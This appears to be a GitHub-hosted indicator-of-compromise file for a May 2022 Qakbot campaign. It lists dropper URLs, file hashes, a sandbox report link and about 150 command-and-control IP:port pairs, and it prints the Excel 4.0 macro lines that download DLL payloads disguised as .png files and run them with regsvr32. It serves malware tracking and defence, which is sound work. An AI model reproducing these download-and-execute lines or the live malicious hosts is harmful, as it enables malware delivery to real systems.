-
Notifications
You must be signed in to change notification settings - Fork 30
/
Copy pathQakbot_AA_10.05.2022.txt
210 lines (187 loc) · 4.88 KB
/
Qakbot_AA_10.05.2022.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
10.05.2022 | Qakbot | AA | Version 403.573 | Campaign | 1651213569
******************************
.url https://bluescapeswelworthrealty.com/mfuu/emnilihni
.url https://ktmhankooksarang.com/siua/relsugnltapuedeif
.url https://kaltarahost.com/et/mpoedteri
.url https://bluescapeswelworthrealty.com/mfuu/emnilihni
.url https://netfornet.com/ei/rietestvitas
.url https://bambinous.com/vnpu/qtnuuniaiicd
.xls c17c6c51fb35db72a4f7f72956402f9ef2efedfb3c1ad23795207d071c2f5687
.dll cbd9a472f9588a205390a6ee56722f15aaefe8364bccfeccf7a8ca04b2ec07d1
******************************
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\Yecgtrio\", 0)
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\Yecgtrio\Iaforsta\", 0)
regsvr32 /s calc
regsvr32 C:\Yecgtrio\Iaforsta\Bygenseb.OOOOCCCXXX
regsvr32 C:\Yecgtrio\Iaforsta\BygenseA.OOOOCCCXXX
regsvr32 C:\Yecgtrio\Iaforsta\Bygenseb.OOOOCCCXXX
******************************
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\Nychtria", 0)
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\Nychtria\Byfosrta", 0)
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "HTTPS://sahlonline.com/0f6eAzyWLUL/Lkmn.png", "C:\Nychtria\Byfosrta\Nyfense.OOOOOCCCCCXXXXX")
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "HTTPS://faproadvisors.com/vtfLDJvyF5g/Lkmn.png", "C:\Nychtria\Byfosrta\Nyfensea.OOOOOCCCCCXXXXX")
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "HTTPS://truckmate.org/PD6TAp7csO/Lkmn.png", "C:\Nychtria\Byfosrta\Nyfenseb.OOOOOCCCCCXXXXX")
https://sahlonline.com/0f6eAzyWLUL/Lkmn.png
https://faproadvisors.com/vtfLDJvyF5g/Lkmn.png
https://truckmate.org/PD6TAp7csO/Lkmn.png
*************************************************
Exec >>
EXCEL.EXE C:\Users\Admin\AppData\Local\Temp\z397139224.xlsb
regsvr32 /s calc
regsvr32 C:\Nychtria\Byfosrta\Nyfense.OOOOOCCCCCXXXXX
regsvr32 C:\Nychtria\Byfosrta\Nyfensea.OOOOOCCCCCXXXXX
regsvr32 C:\Nychtria\Byfosrta\Nyfenseb.OOOOOCCCCCXXXXX
*************************************************
https://tria.ge/220511-m44r7sbafq
*************************************************
c2's
24.178.196.158:2222
91.177.173.10:995
181.208.248.227:443
103.107.113.120:443
80.11.74.81:2222
2.50.17.128:2222
148.0.57.85:443
179.179.162.9:993
37.186.54.254:995
120.150.218.241:995
176.67.56.94:443
108.60.213.141:443
208.107.221.224:443
113.53.151.59:443
58.105.167.36:50000
141.237.86.114:995
70.46.220.114:443
74.14.7.71:2222
172.115.177.204:2222
189.146.78.175:443
194.36.28.102:443
32.221.224.140:995
113.110.253.185:995
24.152.219.253:995
197.83.230.61:443
104.34.212.7:32103
47.23.89.62:993
38.70.253.226:2222
75.99.168.194:443
41.228.22.180:443
148.64.96.100:443
2.50.4.57:443
118.161.34.21:995
67.209.195.198:443
187.207.47.198:61202
140.82.49.12:443
203.122.46.130:443
217.128.122.65:2222
118.161.34.21:443
83.110.218.155:993
5.32.41.45:443
72.76.94.99:443
76.70.9.169:2222
2.34.12.8:443
92.132.172.197:2222
75.99.168.194:61201
46.107.48.202:443
103.139.243.207:990
103.87.95.133:2222
63.143.92.99:995
173.174.216.62:443
174.69.215.101:443
86.98.208.214:2222
76.25.142.196:443
45.63.1.12:443
144.202.3.39:443
144.202.3.39:995
149.28.238.199:443
45.76.167.26:995
149.28.238.199:995
140.82.63.183:995
144.202.2.175:995
45.63.1.12:995
140.82.63.183:443
144.202.2.175:443
45.76.167.26:443
173.21.10.71:2222
73.151.236.31:443
67.165.206.193:993
45.46.53.140:2222
191.99.191.28:443
180.129.20.164:995
85.246.82.244:443
149.135.101.20:443
31.35.28.29:443
187.208.0.99:443
201.142.133.198:443
82.41.63.217:443
201.172.23.68:2222
72.252.157.172:990
190.252.242.69:443
70.51.152.61:2222
90.120.65.153:2078
217.118.46.41:2222
72.252.157.172:995
39.33.170.57:995
177.102.2.175:32101
40.134.246.185:995
5.193.104.246:2222
100.1.108.246:443
24.139.72.117:443
24.55.67.176:443
187.102.135.141:2222
69.14.172.24:443
94.36.195.102:2222
89.101.97.139:443
47.156.191.217:443
179.158.105.44:443
2.191.231.178:443
37.34.253.233:443
109.12.111.14:443
41.215.148.115:995
103.157.122.130:21
93.48.80.198:995
86.195.158.178:2222
105.99.204.185:443
96.37.113.36:993
86.132.13.91:2078
183.82.103.213:443
196.203.37.215:80
89.86.33.217:443
186.64.67.8:443
67.69.166.79:2222
103.233.141.208:2222
121.74.167.191:995
190.36.233.41:2222
68.204.7.158:443
197.94.84.67:443
79.129.121.68:995
106.51.48.170:50001
72.66.116.235:995
82.152.39.39:443
72.12.115.78:22
103.139.243.207:993
89.137.52.44:443
103.246.242.202:443
191.34.199.46:443
120.61.0.220:443
98.50.191.202:443
96.45.66.216:61202
102.182.232.3:995
89.211.182.31:2222
84.241.8.23:32103
172.114.160.81:995
217.164.117.87:1194
45.9.20.200:443
47.23.89.62:995
187.172.191.97:443
24.43.99.75:443
103.88.226.30:443
182.191.92.203:995
39.44.144.64:995
45.241.254.110:993
39.57.56.19:995
121.7.223.59:2222
94.140.8.55:2222
172.114.160.81:443
39.49.69.112:995
102.65.23.65:443
103.116.178.85:995